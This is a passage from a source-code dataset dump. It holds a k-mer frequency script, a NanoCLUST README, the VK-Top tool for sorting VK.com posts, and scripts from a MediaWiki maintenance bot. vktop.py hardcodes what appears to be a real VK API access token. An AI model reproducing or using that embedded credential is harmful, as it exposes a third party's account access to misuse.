frac:\n kmer_comp = float(n) / sum(combined_kmer_n.values())\n else:\n kmer_comp = math.log(float(n + 1) / sum(combined_kmer_n.values())) # adding pseudocount for log transform\n seq_comp.append(kmer_comp)\n\n return read_id, seq_comp\n\ndef build_args_for_kmer_calc(read_num, target_range, args, read_id, seq, k, combined_kmers, lengths_d, count, frac):\n status = \"keep going\"\n if read_num>=target_range[0] and read_num<=target_range[1]:\n\n # if read_num%1000==0: print(\"Loading...\",target_range, read_num)\n\n args.append( (read_id, seq, k, combined_kmers, read_num, count, frac) )\n lengths_d[read_id] = len(seq)\n elif read_num>target_range[1]:\n status = \"over\"\n return args,status\n\ndef launch_seq_kmers_pool( fastx, ftype, k, threads, target_range, combined_kmers, count, frac ):\n \n args = []\n lengths_d = {}\n\n if ftype==\"fastq\":\n for read_num, (read_id, seq, qual) in enumerate(FastqGeneralIterator(open(fastx))):\n args,status = build_args_for_kmer_calc(read_num, target_range, args, read_id, seq, k, combined_kmers, lengths_d, count, frac)\n if status==\"over\":\n break\n\n elif ftype==\"fasta\":\n for read_num, (read_id, seq) in enumerate(SimpleFastaParser(open(fastx))):\n args,status = build_args_for_kmer_calc(read_num, target_range, args, read_id, seq, k, combined_kmers, lengths_d, count, frac)\n if status==\"over\":\n break\n \n results = launch_pool( threads, calc_seq_kmer_freqs, args )\n \n return dict(results), lengths_d\n\ndef print_comp_vectors(read_num, target_range, comp_vectors, read_id, lengths_d):\n status = \"keep going\"\n if read_num>=target_range[0] and read_num<=target_range[1]:\n\n # if read_num%1000==0: print(\"writing...\",target_range, read_num)\n comp_vec_str = \"\\t\".join( map(lambda x: str(round(x,4)), comp_vectors[read_id]))\n print(\"%s\\t%i\\t%s\" % (read_id.split(\" \")[0], lengths_d[read_id], comp_vec_str))\n elif read_num>target_range[1]:\n status = \"over\"\n return status\n\ndef write_output( fastx, ftype, comp_vectors, lengths_d, target_range ):\n\n if ftype==\"fastq\":\n for read_num, (read_id, seq, qual) in enumerate(FastqGeneralIterator(open(fastx))):\n status = print_comp_vectors(read_num, target_range, comp_vectors, read_id, lengths_d)\n if status==\"over\":\n break\n\n elif ftype==\"fasta\":\n for read_num, (read_id, seq) in enumerate(SimpleFastaParser(open(fastx))):\n status = print_comp_vectors(read_num, target_range, comp_vectors, read_id, lengths_d)\n if status==\"over\":\n break\n\ndef get_n_reads(fastx, ftype):\n n_lines = 0\n with open(fastx) as f:\n for i, l in enumerate(f):\n n_lines += 1\n \n if ftype==\"fastq\":\n n_reads = len([read_tup for read_tup in FastqGeneralIterator(open(fastx))])\n elif ftype==\"fasta\":\n n_reads = len([read_tup for read_tup in SimpleFastaParser(open(fastx))])\n return n_reads\n\ndef check_input_format(fastx):\n for line in open(fastx).readlines():\n break\n\n if line[0]==\"@\":\n ftype = \"fastq\"\n elif line[0]==\">\":\n ftype = \"fasta\"\n else:\n raise(\"Unexpected file type! Only *.fasta, *.fa, *.fsa, *.fna, *.fastq, and *.fq recognized.\")\n return ftype\n\ndef main(args):\n ftype = check_input_format(args.qced_reads)\n n_reads = get_n_reads(args.qced_reads, ftype)\n\n chunk_n_reads = 5000\n\n all_kmers = build_all_kmers(args.k)\n combined_kmers = combine_kmers_list(all_kmers)\n\n print(\"read\\tlength\\t%s\" % \"\\t\".join(combined_kmers))\n\n read_chunks = list(chunks(range(n_reads), chunk_n_reads))\n\n for chunk in tqdm(read_chunks):\n target_range = (chunk[0], chunk[-1])\n \n comp_vectors,lengths_d = launch_seq_kmers_pool( args.qced_reads, \\\n ftype, \\\n args.k, \\\n args.threads, \\\n target_range, \\\n combined_kmers, \\\n args.count, \\\n args.frac )\n write_output( args.qced_reads, ftype, comp_vectors, lengths_d, target_range )\n\nif __name__==\"__main__\":\n args = parse_args()\n\n main(args)"
},
{
"alpha_fraction": 0.7400000095367432,
"alphanum_fraction": 0.7649999856948853,
"avg_line_length": 27.571428298950195,
"blob_id": "8860ec30606d53f8de326db97c817cb4230ed59a",
"content_id": "7c4c818832a382d3d49ce8e9c098399ae9c6dd2b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 200,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 7,
"path": "/docs/README.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# nf-core/nanoclust: Documentation\n\nThe nf-core/nanoclust documentation is split into the following files:\n\n1. [Introduction](index.md)\n3. [Usage](2usage.md)\n4. [Pipeline output](3pipeline_output.md)\n"
}
] | 19 |
kashamalasha/VK-Top
|
https://github.com/kashamalasha/VK-Top
|
b269a2896f1ceee50815ceb5f875fb93d9cddb9f
|
02f565b4439319c3f72d3a5e0c4dc90fb072b001
|
4843aec160b240431f9368fe5ef96601cc526687
|
refs/heads/master
| 2020-12-27T09:36:39.096806 | 2016-03-10T21:02:44 | 2016-03-10T21:02:44 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6135593056678772,
"alphanum_fraction": 0.6203389763832092,
"avg_line_length": 25.81818199157715,
"blob_id": "2c62ba56911f48ab1e157a88d07b5fa14006fa95",
"content_id": "8e33c69c6058c1e5f08ba6ad129908b9eb0517cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 22,
"path": "/setup.py",
"repo_name": "kashamalasha/VK-Top",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\nsetup(\n name = 'vktop',\n packages = ['vktop'],\n version = '1.1',\n description = 'Sort posts of any page at VK.com',\n author = 'Dmitry Yutkin',\n author_email = '[email protected]',\n url = 'https://github.com/yutkin/VK-Top',\n download_url = 'https://github.com/yutkin/VK-Top/tarball/1.1',\n include_package_data=True,\n license='MIT',\n keywords = ['vk.com', 'vk', 'downloader', 'posts', 'social', 'networks'],\n classifiers = [],\n entry_points=dict(\n console_scripts=[\n 'vktop=vktop.vktop:main'\n ]\n ),\n install_requires=['requests'],\n platforms=['any'],\n)\n"
},
{
"alpha_fraction": 0.5991649031639099,
"alphanum_fraction": 0.6482254862785339,
"avg_line_length": 24.891891479492188,
"blob_id": "ab00ce3b546072906dfd70083615463f5fad3183",
"content_id": "956cb027db236ae3ecb613884c4250163cfb48e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 958,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 37,
"path": "/README.md",
"repo_name": "kashamalasha/VK-Top",
"src_encoding": "UTF-8",
"text": "## Installation\n`pip install vktop`\n\n##Dependencies\n- [Requests]\n\n##Help\n```\nusage: vktop.py [-h] [-l | -r] [-t TOP] [-d DAYS] url\n\nSort posts of any public availabe page at VK.com.\nGithub: https://github.com/yutkin/VK-Top\n\nPossible types of input URLs:\n- https://vk.com/page_name\n- http://vk.com/club12345\n- public1234567\n- id1234567\n- event1234567\n\npositional arguments:\n url target page\n\noptional arguments:\n -h, --help show this help message and exit\n -l, --likes sort posts by likes (by default)\n -r, --reposts sort posts by reposts\n -t TOP, --top TOP number of showing posts. (10 by default)\n -d DAYS, --days DAYS last period (in days) for post processing. (all period\n by default)\n\n```\n##Usage example\n![alt text][example]\n\n[example]: http://s11.postimg.org/5xs9hakk3/Screen_Shot_2016_01_09_at_00_05_24.png \"Example\"\n[Requests]: https://github.com/kennethreitz/requests\n"
},
{
"alpha_fraction": 0.5623037815093994,
"alphanum_fraction": 0.5760528445243835,
"avg_line_length": 31.524648666381836,
"blob_id": "5c26d8558f6b6c55cccff7cd5f67fb6118b7da3e",
"content_id": "7f55ebd3d1d2329a05286516cc83cd605b70e7f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9237,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 284,
"path": "/vktop/vktop.py",
"repo_name": "kashamalasha/VK-Top",
"src_encoding": "UTF-8",
"text": "#!/usr/local/bin/python\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Yutkin Dmitry\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport argparse\nfrom datetime import datetime, timedelta\nimport json\nimport sys\nimport requests\nimport time\nimport re\nimport textwrap\n\n\nAPP_DESCRIPTION = textwrap.dedent('''\n Sort posts of any public availabe page at VK.com.\n Github: https://github.com/yutkin/VK-Top\n\n Possible types of input URLs:\n - https://vk.com/page_name\n - http://vk.com/club12345\n - public1234567\n - id1234567\n - event1234567\n ''')\n\nLIKES = 'likes'\nREPOSTS = 'reposts'\n\nACCESS_TOKEN = 'ff8faef07fe2666af8743cd4384fa595f85927d6c39dc4360e831a149d9f956710be447816dd857d2dee7'\n\nAPI_URL = 'https://api.vk.com/method/'\nAPI_V = 5.37\n\nINVALID_URL = ('{url} - invalid url address')\nNEGATIVE_ARGUMENT = ('{argument} - should be greater or equal to 0')\nMANY_REQUESTS = 6\nHIDDEN_WALL = 13\n\n\nTXT_ID_PTRN = r'(?:https?:\\/\\/)(?:vk.com\\/(?!club|public|id|event))(?P<id>(?![_.])(?!club|public|id|event)[a-z0-9_.]*[a-z][a-z0-9_.]*)'\nNUM_ID_PTRN = r'^(?:https?:\\/\\/)?(?:vk.com\\/)?(?P<type>club|public|id|event)(?P<id>\\d+)$'\nTXT_ID_REGEXP = re.compile(TXT_ID_PTRN)\nNUM_ID_REGEXP = re.compile(NUM_ID_PTRN)\n\nclass HiddenWall(BaseException):\n \"\"\" Dummy exception \"\"\"\n pass\n\n\nclass PageNotAvailable(BaseException):\n \"\"\" Dummy exception \"\"\"\n pass\n\n\ndef url_validator(arg):\n \"\"\" Checks correctness of url argument \"\"\"\n arg = arg.lower()\n\n # If url something like https://vk.com/textual_id\n matched_txt_id = TXT_ID_REGEXP.match(arg)\n if matched_txt_id:\n url = matched_txt_id.groupdict()\n url['type'] = 'symbolic'\n return url\n\n # If url something like https://vk.com/id123456\n matched_numeric_id = NUM_ID_REGEXP.match(arg)\n if matched_numeric_id:\n return matched_numeric_id.groupdict()\n\n raise argparse.ArgumentTypeError(\n INVALID_URL.format(url=arg))\n\n\ndef num_validator(arg):\n \"\"\" Checks numbers on negativity \"\"\"\n num = int(arg)\n if num >= 0:\n return num\n else:\n raise argparse.ArgumentTypeError(\n NEGATIVE_ARGUMENT.format(argument=arg))\n\n\ndef parse_args():\n \"\"\" Parses input arguments \"\"\"\n parser = argparse.ArgumentParser(description=APP_DESCRIPTION,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('url',\n action='store',\n default=None,\n help='target page',\n type=url_validator)\n\n compar_key = parser.add_mutually_exclusive_group()\n\n compar_key.add_argument('-l',\n '--likes',\n help='sort posts by likes (by default)',\n action='store_true',\n default=True)\n\n compar_key.add_argument('-r',\n '--reposts',\n help='sort posts by reposts',\n action='store_true')\n\n parser.add_argument('-t',\n '--top',\n help='number of showing posts. (10 by default)',\n default=10,\n type=num_validator)\n\n parser.add_argument('-d',\n '--days',\n type=int,\n default=-1,\n help='last period (in days) for post processing. '\n '(all period by default)')\n\n return parser.parse_args()\n\n\ndef get_page_id(url):\n \"\"\" Returns page's numeric ID \"\"\"\n if url['type'] not in ['id', 'public', 'event', 'club']:\n params = {'screen_name': url['id']}\n request = requests.get(API_URL + 'utils.resolveScreenName?',\n params=params)\n response = json.loads(request.text)['response']\n\n if response:\n if response['type'] == 'user':\n return response['object_id']\n else:\n return -response['object_id']\n else:\n raise PageNotAvailable(url['id'] + ' is not available')\n elif url['type'] == 'id':\n return int(url['id'])\n else:\n return -int(url['id'])\n\n\ndef recieve_posts(page_id, last_days, reposts):\n \"\"\"\n Returns posts from :page_id: that were posted not earlier\n than :last_days: ago\n \"\"\"\n deadline = datetime.now() - timedelta(days=last_days)\n unix_stamp = int(deadline.strftime(\"%s\"))\n\n if reposts:\n compar_key = REPOSTS\n else:\n compar_key = LIKES\n\n params = {'access_token': ACCESS_TOKEN,\n 'id': page_id,\n 'compar_key': compar_key,\n 'deadline': unix_stamp if last_days != -1 else last_days\n }\n received_posts = []\n\n offset = 0\n ONGOING = True\n while ONGOING:\n params['offset'] = offset\n response = json.loads(requests.post(\n API_URL + 'execute.getPostsNew?', params=params).text)\n\n if 'error' in response:\n error = response['error']['error_code']\n if error == MANY_REQUESTS:\n continue\n if error == HIDDEN_WALL:\n raise HiddenWall('Wall is closed for outside view')\n raise RuntimeError(response['error']['error_msg'])\n\n # Interrupt loop when all posts were received\n if not response['response']:\n break\n\n received_data = response['response']\n for chunk in received_data:\n chunk_size = len(chunk['ids'])\n for i in range(chunk_size):\n post = dict()\n post['date'] = datetime.fromtimestamp(chunk['dates'][i])\n if chunk[compar_key][i] and (last_days == -1\n or post['date'].year >= deadline.year\n and post['date'].month >= deadline.month\n and post['date'].day >= deadline.day):\n\n post['id'] = chunk['ids'][i]\n post[compar_key] = chunk[compar_key][i]\n received_posts.append(post)\n if 'stop' in chunk:\n ONGOING = False\n break\n offset += 1\n\n return received_posts\n\n\ndef sort_posts(posts, reposts=False):\n \"\"\" Sort posts by specified parameter \"\"\"\n if reposts:\n return sorted(posts, key=lambda post: -post['reposts'])\n else:\n return sorted(posts, key=lambda post: -post['likes'])\n\n\ndef main():\n \"\"\" Main entry point for execution as a program \"\"\"\n\n init_point = time.time()\n args = parse_args()\n try:\n page_id = get_page_id(args.url)\n print('Downloading posts. '\n 'This may take some time, be patient...')\n received_posts = recieve_posts(page_id, args.days, args.reposts)\n received_posts = sort_posts(received_posts, args.reposts)\n except (PageNotAvailable, HiddenWall) as error:\n print('{0}: error: {1}'.format(sys.argv[0], error))\n return\n except KeyboardInterrupt:\n print('Exiting...')\n return\n except Exception:\n print('{0}: error: {1}'.format(sys.argv[0], 'Unknown error'))\n return\n\n\n post_count = len(received_posts)\n if args.top and post_count:\n num_posts_for_showing = post_count if args.top > post_count else args.top\n elif post_count:\n num_posts_for_showing = post_count\n else:\n return\n\n max_url_width = len(str(max(received_posts, key=lambda x: x['id'])['id'])) + \\\n len('https://vk.com/wall_') + len(str(page_id))\n\n print('Elapsed time: {:.2f} sec.'.format(time.time() - init_point))\n for i, post in enumerate(received_posts[:num_posts_for_showing]):\n link = 'https://vk.com/wall{0}_{1}'.format(page_id, post['id'])\n print('{num:>{num_width}} {url:<{url_width}} {date:<14} {type}: {count:,}'.format(\n num=str(i+1)+')',\n num_width=len(str(num_posts_for_showing))+1,\n url=link,\n url_width=max_url_width + 4,\n date=str(post['date'])[:10],\n type='Reposts' if args.reposts else 'Likes',\n count=post['reposts'] if args.reposts else post['likes'])\n )\n\nif __name__ == '__main__':\n main()\n"
}
] | 3 |
uwmadison-chm/factuator
|
https://github.com/uwmadison-chm/factuator
|
4c270ae713fca47a390544421912f70726dfb0f0
|
83e2dc797669da7e58f89b4b88f02f21c5a46c17
|
91de6eb270183c541aaa1ff17b99fc6e29e14744
|
refs/heads/master
| 2022-12-13T14:16:04.742057 | 2022-08-18T16:01:40 | 2022-08-18T16:01:40 | 175,715,761 | 0 | 1 |
MIT
| 2019-03-14T23:33:59 | 2021-12-30T00:39:50 | 2022-12-08T05:10:34 |
Python
|
[
{
"alpha_fraction": 0.7025683522224426,
"alphanum_fraction": 0.7100248336791992,
"avg_line_length": 23.139999389648438,
"blob_id": "551032efcb847ba08cd2d25a8d91400cbd139ae4",
"content_id": "cf49f05f0e03a2be04604758905ce3ee42702cdc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1207,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 50,
"path": "/README.md",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "# factuator\n\nA Python bot to help maintain fancier features of the MOTHER wiki at CHM.\n\n## Requirements\n\n python3 -m virtualenv .venv\n source .venv/bin/activate\n pip3 install -r requirements.txt\n\n## Kerberos security\n\nYou'll need to `kinit` to get a token.\n\n## Examples\n\nFactuator can be loud, just add `-v` for info messages or `-vv` for debug logging.\n\nCurrently, it warns you if it's actually updating things, and it tries to only \npost changes if things are different.\n\n### Update study pages\n\nUpdate all `{{Study}}` infobox templates on Category:Study pages.\n\n python3 factuator.py --study\n\n### Media links\n\nReplace all `[[:File:Name.pdf]]` and `[[File:Name.pdf]]` style links with \n`[[Media:Name.pdf]]` to make them link directly to the file.\n\nOn a page:\n\n python3 factuator.py --medialinks-page User:Myname\n\nOn multiple pages:\n\n python3 factuator.py --medialinks-page \"Page 1\" --medialinks-page \"Page Title 2\"\n\nOn all pages in a category:\n\n python3 factuator.py --medialinks-category \"Self Report Measure\"\n\n### Rename category\n\nReplace all `[[Category:A]]` with `[[Category:B]]`. (Does not currently check \nfor `[[:Category:A]]`.)\n\n python3 factuator.py --rename-category A B\n"
},
{
"alpha_fraction": 0.5377826690673828,
"alphanum_fraction": 0.5391616225242615,
"avg_line_length": 38.41304397583008,
"blob_id": "b500a39aa1be2bc9d1427982511a1c2ba3aabf82",
"content_id": "7a6c863042784d302b15ab27099cfec3f16e7f43",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3626,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 92,
"path": "/redirectlinks.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nimport sys\n\ndef fix(page):\n text = page.text()\n p = mwparserfromhell.parse(text)\n has_bad_link = False\n red_link = \"\"\n if \"#REDIRECT\" in p:\n logging.info(f\"`{page.name}` is an empty redirect page, fixing link...\")\n red = p.filter_wikilinks()\n has_bad_link = True\n for link in red:\n red_link = link.title\n\n return red_link, has_bad_link\n \ndef run_category(mother, category_name):\n category = mother.categories[category_name]\n for page in category:\n run_page(mother, page)\n\n\ndef run_pages(mother, pages):\n for title in pages:\n page = mother.pages[title]\n run_page(mother, page)\n\n\ndef run_page(mother, page):\n oldtext = page.text()\n p = mwparserfromhell.parse(oldtext)\n link_titles = []\n \n # Replaces links to redirected pages with proper link\n for link in p.filter_wikilinks():\n link_title = str(link.title)\n link_page = mother.pages[link_title]\n red_link, has_bad_link = fix(link_page)\n if has_bad_link:\n link_titles.append(link_title)\n p.replace(link.title, red_link)\n newpage = str(p)\n \n if oldtext != newpage:\n logging.warning(\"Updating %s page, change detected\\n\", page.name)\n page.save(newpage, \"Automated edit to make links to redirected pages link to proper page instead\")\n \n # Optional: Look for same redirect pages on entire MOTHER wiki. Replaces appropriate links and deleting redirect pages when no longer being used\n if len(link_titles) > 0 :\n # TODO: disabling for now\n return\n replace_all = input(\"Search the rest of the Wiki for these redirected links? [y/n]:\")\n while (len(replace_all) >= 1):\n \n if replace_all.upper() == 'Y':\n link_index = 0\n for link_index in range(len(link_titles)):\n page_link = mother.pages[link_titles[link_index]]\n links_here = page_link.backlinks(filterredir = 'all', redirect = True, limit = None)\n new_index = 0\n for page in links_here:\n bad_page = mother.pages[page.name]\n badtext = bad_page.text()\n bp = mwparserfromhell.parse(badtext)\n for link in bp.filter_wikilinks():\n for new_index in range(len(link_titles)):\n if link.title == (link_titles[new_index]):\n bp.replace(link.title, red_link)\n newpage = str(bp) \n \n if badtext != newpage:\n logging.warning(\"Updating %s page, change detected\\n\", bad_page.name)\n page.save(newpage, \"Automated edit to make links to redirected pages link to proper page instead\")\n \n link_index = 0\n for link_index in range(len(link_titles)):\n link_page = mother.pages[link_titles[link_index]]\n logging.warning(\"Deleting %s page, no longer being used\\n\", link_titles[link_index])\n link_page.delete()\n \n break\n \n elif replace_all.upper() == 'N': \n break\n \n else:\n print(\"\\nPlease enter a proper response.\")\n replace_all = input(\"Search the rest of the Wiki for these redirected links? [y/n]: \")\n"
},
{
"alpha_fraction": 0.680497944355011,
"alphanum_fraction": 0.680497944355011,
"avg_line_length": 44.1875,
"blob_id": "18c81aad0ac5cc58a7edec4c3d053371018eb2f0",
"content_id": "5988a02716a4fb7587f6d38aa9c8b6455666b1f0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 723,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 16,
"path": "/renamecategory.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport traceback\n\ndef run(mother, old_category_name, new_category_name):\n category = mother.categories[old_category_name]\n for page in category:\n oldtext = page.text()\n newtext = oldtext.replace(f\"[[Category:{old_category_name}]]\", f\"[[Category:{new_category_name}]]\")\n\n if oldtext.strip() != newtext.strip():\n logging.warning(f\"Updating page {page.name}, Category:{old_category_name} to Category:{new_category_name}\")\n page.save(newtext, f\"Automated edit to update Category:{old_category_name} to Category:{new_category_name}\")\n else:\n logging.info(\"Not updating page %s, text identical\", page.name)\n"
},
{
"alpha_fraction": 0.5237822532653809,
"alphanum_fraction": 0.5243552923202515,
"avg_line_length": 27.129032135009766,
"blob_id": "17dcc289b3885ac0bc8bbc591822cc6cc188f7b2",
"content_id": "81dd9c91c3fccb96d13b8b9d50b5b2021b2f8c35",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1745,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 62,
"path": "/studyreport.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nimport csv\nfrom utilities import study_template\n\ndef fetch(page, template, key):\n thing = \"\"\n try:\n thing = template.get(key).value.rstrip()\n except ValueError:\n logging.warning(f\"No '{key}' on study page {page.name}\")\n pass\n return thing\n\ndef run(mother):\n category = mother.categories['Study']\n\n with open('studyreport.csv', 'w') as csvfile:\n writer = csv.writer(csvfile)\n columns = [\n \"Study\",\n \"AKA\",\n \"Short Description\",\n \"Study Status\",\n \"Active\",\n \"In Quarterly Progress Report\",\n \"Verified for Progress Report Date\",\n \"Funded Fully or Partially Through RSP\",\n \"CHM Website\",\n \"Start Date\",\n \"End Date\",\n \"Planning Start Date\",\n \"Piloting Start Date\",\n \"Collecting Start Date\",\n \"Projected Enrollment\",\n \"Current Enrollment\",\n \"IRB Number\",\n \"Grant Number\",\n \"Funding Source\",\n \"ARROW URL\",\n \"NIH RePORTER ID\",\n \"ClinicalTrials.Gov\",\n \"JARVIS ID\",\n \"PIs\",\n \"Project Manager\",\n \"Current Contact\",\n \"Project Links\",\n ]\n\n writer.writerow(columns)\n for page in category:\n logging.debug(\"Loading study\", page.name)\n text = page.text()\n p = mwparserfromhell.parse(text)\n\n template = study_template(p)\n column_values = [fetch(page, template, x) for x in columns]\n column_values[0] = page.name\n\n writer.writerow(column_values)\n\n"
},
{
"alpha_fraction": 0.5189393758773804,
"alphanum_fraction": 0.7196969985961914,
"avg_line_length": 16.600000381469727,
"blob_id": "3ea7e0b1460cff0660549a7a765298dc7df97bde",
"content_id": "29fc54ec53180bebc2e7a42e009c0f4d77e1ecea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 264,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 15,
"path": "/requirements.txt",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "certifi==2019.3.9\nchardet==3.0.4\ncoloredlogs==10.0\nhumanfriendly==4.18\nidna==2.8\nmwclient==0.10.1\nmwparserfromhell==0.5.4\noauthlib==3.0.1\npsycopg2==2.8.2\npython-dateutil==2.8.0\nrequests==2.22.0\nrequests-oauthlib==1.2.0\nsix==1.12.0\nurllib3>=1.26.7\ngoogleapi>=0.1.0\n"
},
{
"alpha_fraction": 0.613892674446106,
"alphanum_fraction": 0.615471363067627,
"avg_line_length": 39.29999923706055,
"blob_id": "065841e2d253b81a9f98cb114188bd4967e26ac2",
"content_id": "2e72bdb6b4a5dfe3e1b738fa5b8c94b856e0cc87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4434,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 110,
"path": "/studylibrary.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nfrom utilities import study_template\nfrom jarvis import Jarvis\n\ndef run(mother):\n category = mother.categories['Study']\n all_studies = set()\n status = {}\n has_status = set()\n missing_status = set()\n missing_jarvis = set()\n jarvis_ids = set()\n\n for page in category:\n logging.debug(\"Checking study\", page.name)\n all_studies.add(page.name)\n text = page.text()\n p = mwparserfromhell.parse(text)\n template = study_template(p)\n if template:\n if template.has(\"Study Status\"):\n s = template.get(\"Study Status\").value.strip()\n if s == \"\": continue\n words = re.split(r',\\s*', s)\n for c in words:\n status[c] = status.get(c, set())\n status[c].add(page.name)\n has_status.add(page.name)\n\n if not template.has(\"JARVIS ID\") or \\\n template.get(\"JARVIS ID\").value.strip() == \"\":\n missing_jarvis.add(page.name)\n else:\n jarvis_ids.add(int(template.get(\"JARVIS ID\").value.strip()))\n\n if not page.name in has_status:\n missing_status.add(page.name)\n\n logging.debug(\"Got status: \", status)\n\n # Now statuses contains a hash of construct -> list of pages.\n # NOTE: This re-uses MediaWiki's category CSS classes to get three-column display. Maybe weird to do that?\n oldtext = category.text()\n cat = mwparserfromhell.parse(oldtext)\n sections = cat.get_sections()\n title = \"== Sorted by Study Status ==\"\n newtext = title + \"\\n\\nPlease note: this section is created automatically based on the status in each study's infobox. To edit, go to the study's page and choose 'Edit with form'.\\n\\n\"\n newtext += \"<div class='mw-category'>\"\n\n # Build up an index by status\n # Sort by certain rules\n sort_order = [\n \"In Development\", \"Piloting\", \"Collecting\", \"Data Collection Complete\", \n \"Analyzing\", \"Publishing\", \"IRB Closed\"]\n for k in sort_order:\n if not k in status:\n continue\n newtext += \"<div class='mw-category-group'><h3>\" + k + \"</h3>\\n\"\n for study in sorted(list(status[k])):\n newtext += \"* [[\" + study + \"]]\\n\"\n newtext += \"</div>\"\n\n # List out things that are missing statuses\n newtext += \"<div class='mw-category-group'><h3>No statuses listed</h3>\\n\"\n for m in missing_status:\n newtext += \"* [[\" + m + \"]]\\n\"\n newtext += \"</div>\"\n\n newtext += \"</div>\\n\\n\"\n\n # Replace the \"Sorted by Study Status\" section with our new text\n old_section = cat.get_sections(matches = \"Sorted by Study Status\")[0]\n cat.replace(old_section, newtext)\n newpage = str(cat)\n\n if oldtext != newpage:\n logging.warning(\"Updating study category page, change detected\")\n category.save(newpage, \"Automated edit to build status categories on study library\")\n\n # Now we use the statuses and dates we pulled to edit the \"missing Jarvis\" and \"studies not edited for the longest\"\n missing = mother.pages['Study pages missing JARVIS IDs']\n oldtext = missing.text()\n newpage = \"This page is automatically generated. See also [[JARVIS IDs missing study pages]]\\n\\n\"\n newpage += \"== Pages missing JARVIS IDs ==\\n\\n\"\n for page in sorted(missing_jarvis):\n newpage += f\"* [[{page}]]\\n\"\n\n if oldtext != newpage:\n logging.warning(\"Updating missing JARVIS IDs page, change detected\")\n missing.save(newpage, \"Automated edit\")\n\n # Now we build the opposite thing\n missing = mother.pages['JARVIS IDs missing study pages']\n oldtext = missing.text()\n newpage = \"This page is automatically generated and only includes more recent entries in JARVIS. See also [[Study pages missing JARVIS IDs]]\\n\\n\"\n newpage += \"== JARVIS IDs missing study pages ==\\n\\n\"\n\n j = Jarvis()\n all_studies = j.select(\"SELECT id, folder, name, created_at FROM studies ORDER BY created_at DESC LIMIT 30\")\n for s in all_studies:\n jarvis_id, folder, name, created_at = s\n if not jarvis_id in jarvis_ids:\n newpage += f\"* ID {jarvis_id} in /study/{folder}: \\\"{name}\\\" (created at {created_at})\\n\"\n\n if oldtext != newpage:\n logging.warning(\"Updating missing study pages page, change detected\")\n missing.save(newpage, \"Automated edit\")\n\n"
},
{
"alpha_fraction": 0.6195150017738342,
"alphanum_fraction": 0.6200923919677734,
"avg_line_length": 23.02777862548828,
"blob_id": "a0bfa8d6382a04994da648265660d2b0d5fb81b4",
"content_id": "121b2be42ffee8c5bdd06e0f6dd7f50fa5c31a7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1732,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 72,
"path": "/selfreport.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
